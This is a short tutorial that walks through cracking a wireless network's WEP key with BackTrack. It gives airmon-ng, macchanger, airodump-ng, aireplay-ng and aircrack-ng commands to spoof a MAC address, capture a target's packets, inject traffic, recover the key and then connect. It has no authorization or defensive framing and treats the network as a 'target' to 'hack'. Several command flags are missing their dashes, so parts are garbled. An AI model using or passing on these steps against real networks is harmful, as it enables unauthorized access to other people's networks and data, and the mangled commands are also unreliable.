Cracking a WEP key using BackTrack

Terms used in the commands Eth1 = the name of your wireless NIC T-Mac = the mac address of your target Chan = channel of the targets wireless signal Wep123 = name of the file you will write information to Sid = ssid of the wireless network you are penetrating

Preparation commands
Open a Konsole window (Window #1, dont close this window until told to do so) Airmon-ng (shows you your wireless NIC info, this is where you find the NIC name) Airmon-ng stop eth1 (stops the network service on that NIC) Ifconfig eth1 down Macchanger --mac 00:11:22:33:44:55 (changes your mac address) Airmon-ng start eth1 (Now you are all ready to start your hack)

Find your target

Airodump-ng eth1 (look for available wireless targets and get info from them) You can use CTRL + C to stop the scan when you are ready. Make sure you copy the MAC of the target into memory or write it down. Start collecting information about your target Airodump-ng c chan w wep123 --bssid T-Mac eth1 (This will start collecting packets from the target computer. You will need at least 15,000 packets before attempting to crack the wep key) Later when you are told to stop the scan you can use CTRL+C to stop it.

Part Two of the Hack

Open a second Konsole window (Window #2, again dont close this window until told to do so) Aireplay-ng -1 0 a t-mac h 00:11:22:33:44:55 e sid eth1 Aireplay-ng -3 b t-mac h 00:11:22:33:44:55 eth1 After a few minutes you can minimize this window.

Crack the WEP Key

Open a third konsole window (Window #3) If you have more that 15,000 packets so far in window #1 you can start the scan now using CTRL+C Aircrack-ng n 64 b t-mac wep123-01.cap (If you entered the command correctly you should now be seeing the wep key used for protecting this network) If the command errors out for you, open the root drive and search for the wep123 file. The file gets a dash# added to it each time you run a scan so if you accidentally created an extra file of two you will have to look at these files and find the biggest one to use for your hack. If you found the key, you can close all the windows down now after writing down the wep key. Now boot to windows and use the wep key to connect to the network